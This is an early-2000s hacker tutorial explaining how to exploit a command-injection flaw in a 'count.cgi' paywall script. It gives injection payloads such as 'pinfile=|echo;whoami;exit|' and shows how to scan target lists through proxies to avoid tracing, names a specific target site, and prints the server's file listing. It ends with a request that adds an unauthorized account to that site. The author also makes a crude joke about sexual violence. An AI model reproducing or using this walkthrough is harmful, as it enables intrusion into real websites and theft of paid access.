|
(Written By ZenDraL)
All right guys here's a simple exploit for count.cgi I know alot of people say you
have to learn to exploit all on your own. And while I agree that being spoon fed everything is
pointless, sometimes seeing how something is done once can help you learn other things :)
So here's an exploit that won't get you on all the greatest sites out there, but will give you
a basic idea of how to exploit a site. This is my first tutorial so be patient.
Constructive criticism is welcome :) Flame if you will but just know that if you do I'll analy
rape your mom while pouring sugar in your gas tank J/K :)
Just on a side note before we get started, I have recieved getting a good number of
requests for either sites to be cracked or how it's done. So for all of you that
are curious I use AccessDiver (http://www.acccessdiver.com) and
several good tutorials are available on http://www.deny.de and http://www.securibox.net.
You will really only need two things:
A) Triton
B) A Working Proxy.
** Optionaly a TXT file containing a list of urls.
** AccessDiver For HTTP Debugger
Triton is an application that we will use to verify whether a site is vulnerable to this exploit.
In Triton under the sites tab:
-Input the site that you would like to check (or a list of urls).
-Make sure the Count As Bad box is checked in the Redirects area.
-Make sure the Automatically save hits box is checked, and desinate a file for your results.
Under the Paths Tab Input the following data:
Path: /cgi-bin/mastergate/count.cgi
Post Data: pinfile=|echo;whoami;exit|
Good Keywords: nobody
Bad Keyword: error
Under the Connections Tab:
Make sure to use a proxy at all times!!! Input a single proxy or use multiple proxies if you
are scanning a list.
Now you are ready to find a vulnerable site.
Once you have found a site open your HTTP Debugger (CTRL + F9 In Access Diver/Under the Tools Tab in Triton)
For the address you're going to want to input the weak url which we found.
Example:
Adress: worldclasserotica.com/cgi-bin/mastergate/count.cgi
Method: Post
Post Value: pinfile=|echo;ls;exit|
--Output from Debugger
HTTP/1.1 200 OK Date: Tue, 02 Sep 2003 19:06:09 GMT Server: Apache/1.3.19 (Unix) PHP/4.0.4pl1
Content-Type: text/plain Proxy-Connection: Close 9420100
9420101
9420102
9420103
9420500
accountcreate.cgi
add.cgi
admin
cancel.cgi
configure.cgi
count.cgi
database
delete.cgi
log
modify.cgi
passwords
restore.cgi
search.cgi
Content-type: text/html
0 pincodes left in account |echo;ls;exit|
--End of Output
Here we can see several different files that look intersting. You can explore on your own (and
are advised too) but for today we'll just look at add.cgi.
In the HTTP Debugger replace the post value "pinfile=|echo;ls;exit|" with "pinfile=|echo;cat add.cgi;exit|"
this will output the script that the site uses to add acounts to it's database. The following
snippet of code is what we will use to add our own password to the site.
--Code from add.cgi
&refergate;
$expire=$FORM{'expire'};
$pincode=$FORM{'pincode'};
$username=$FORM{'username'};
$password = $FORM{'password'};
$transaction = $FORM{'transaction'};
$subscription = $FORM{'subscription'};
$billingmethod = $FORM{'billingmethod'};
--End
At this point change your HTTP Debugger settings to:
Adress: worldclasserotica.com/cgi-bin/mastergate/add.cgi
Post Value: expire=&pincode=&username=desiredusername&password=desiredpassword&transaction&subscription=
&billingmethod=
Well that's it guys, use it wisely, have fun. :)
ZenDraL
09/02/2003
|
